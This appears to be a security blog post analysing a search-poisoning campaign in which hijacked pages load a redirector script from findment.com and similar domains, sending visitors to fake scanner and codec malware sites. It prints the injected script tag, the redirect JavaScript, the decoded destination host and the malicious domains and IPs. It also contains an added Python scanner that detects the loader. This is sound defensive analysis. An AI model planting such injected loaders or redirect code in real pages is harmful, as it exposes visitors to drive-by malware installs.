The domains findment.com, megazony.com, and megahaty.com, recently registered, are redirecting users to websites intended to get the user to install a rogue program or video codec.
The hijacked webpage contains a script tag that loads the redirector:

```html
<script language="JavaScript" src="http://findment.com/942023.js?sid=bWl6emRvX21pc3NpbmdsYWIuZmluZG1lbnQuY29t"></script>
```
The contents of the script are below. The sid parameter is the base64-encoded hostname of the redirect destination:
bWl6emRvX21pc3NpbmdsYWIuZmluZG1lbnQuY29t decodes to mizzdo_missinglab.findment.com.
```javascript
function LoadAd() {
  // Send the top-level window to the decoded sid host, passing the
  // referring page along in the Ref parameter.
  parent.location.href = "http://mizzdo_missinglab.findment.com/index.html?Ref=" +
    encodeURIComponent(document.referrer);
}
LoadAd();
```
This new URL then redirects the user to known malware installation websites (advanedmalwarescanner.com, malwareliveproscanv1.com, and my-xxx-video.com, to name a few). I found that many of the URLs responsible for the redirection were hosted on 5webs.net, which appears to be a legitimate webhost offering free accounts. According to a Google search there are potentially 21,000 infected webpages. I went through many of the results from that search and almost all of them redirected to a drive-by download. The HTML of the pages carries keywords ranging from "Patrick Swayze Dead" (see the earlier post as well) to "Missing Link found", all tied to current events. Several domains are responsible; they share similar whois information, and all but one were registered today.
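As an added example (not code from the original post), the following Python scanner finds script tags pointing at the loader domains named above, decodes the sid parameter, and reports the redirect destination. The HTML fragment is constructed for the example; the loader domain list, script name and sid value come from the post.

```python
import base64
import binascii
import re
from urllib.parse import urlparse, unquote

# Loader domains named in the post.
LOADER_DOMAINS = {"findment.com", "megazony.com", "megahaty.com", "zonement.com"}

# Constructed page fragment (not a capture): one benign script and one injected loader.
SAMPLE_HTML = """<html><body>
<script src="/js/site.js"></script>
<p>Patrick Swayze Dead ... Missing Link found</p>
<script language="JavaScript" src="http://findment.com/942023.js?sid=bWl6emRvX21pc3NpbmdsYWIuZmluZG1lbnQuY29t"></script>
</body></html>"""

SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HOSTNAME_RE = re.compile(r'^[A-Za-z0-9._-]{1,253}$')  # underscore allowed: the post's host uses one

def query_param(query, name):
    """Plain split of the query string; parse_qs would turn a base64 '+' into a space."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key == name:
            return unquote(value)
    return ""

def decode_sid(sid):
    """Return the hostname hidden in a base64 sid, or None if it does not decode cleanly."""
    padded = sid + "=" * (-len(sid) % 4)  # tolerate stripped '=' padding
    try:
        host = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return host if HOSTNAME_RE.match(host) else None

def find_redirectors(html, loader_domains=LOADER_DOMAINS):
    """Report every external script loaded from a known loader domain and its decoded target."""
    hits = []
    for src in SCRIPT_SRC_RE.findall(html):
        url = urlparse(src)
        host = (url.hostname or "").lower()
        if host not in loader_domains:
            continue  # relative or third-party scripts are not the loader
        sid = query_param(url.query, "sid")
        hits.append({"loader_host": host, "loader_path": url.path,
                     "sid": sid, "target_host": decode_sid(sid)})
    return hits

if __name__ == "__main__":
    for hit in find_redirectors(SAMPLE_HTML):
        print(hit)
```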
Whois entry for findment.com (78.159.98.58)
Whois entry for megazony.com (212.95.56.90)
Whois entry for megahaty.com (78.159.98.58)
NAMESERVERS:
ns1.itsfreedns.com (94.75.213.190)
ns2.itsfreedns.com (212.95.32.72)
ns3.itsfreedns.com (94.76.206.7)
UPDATED:
A new domain has been found using the same technique to infect users through search results.
Whois entry for zonement.com (94.76.205.184)
